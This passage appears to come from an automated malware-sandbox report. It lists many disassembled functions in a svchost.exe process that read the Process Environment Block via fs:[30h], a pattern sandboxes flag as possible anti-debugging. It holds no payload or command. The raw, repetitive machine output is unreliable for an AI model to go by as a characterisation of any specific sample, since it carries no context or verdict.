Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]	2_2_03A72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]	2_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]	2_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]	2_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]	2_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]	2_2_03A62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]	2_2_03A4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]	2_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]	2_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]	2_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]	2_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]	2_2_03A64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]	2_2_03A6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]	2_2_03A325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]	2_2_03A365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]	2_2_03AC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]	2_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]	2_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]	2_2_03A364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03A644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03ABA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03A304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]	2_2_03A2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]	2_2_03A6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]	2_2_03ABC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]	2_2_03A2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]	2_2_03A5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]	2_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]	2_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03A5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03ABCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03ADEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03A2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]	2_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03AD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03A86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]	2_2_03B04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]	2_2_03A68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03A6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03A5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]	2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]	2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03A6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]	2_2_03ABCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]	2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]	2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]	2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]	2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]	2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]	2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03ABE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]	2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]	2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03AC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]	2_2_03A649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03AFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]	2_2_03AB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]	2_2_03AC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]	2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]	2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]	2_2_03ABC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]	2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]	2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]	2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]	2_2_03AD4978
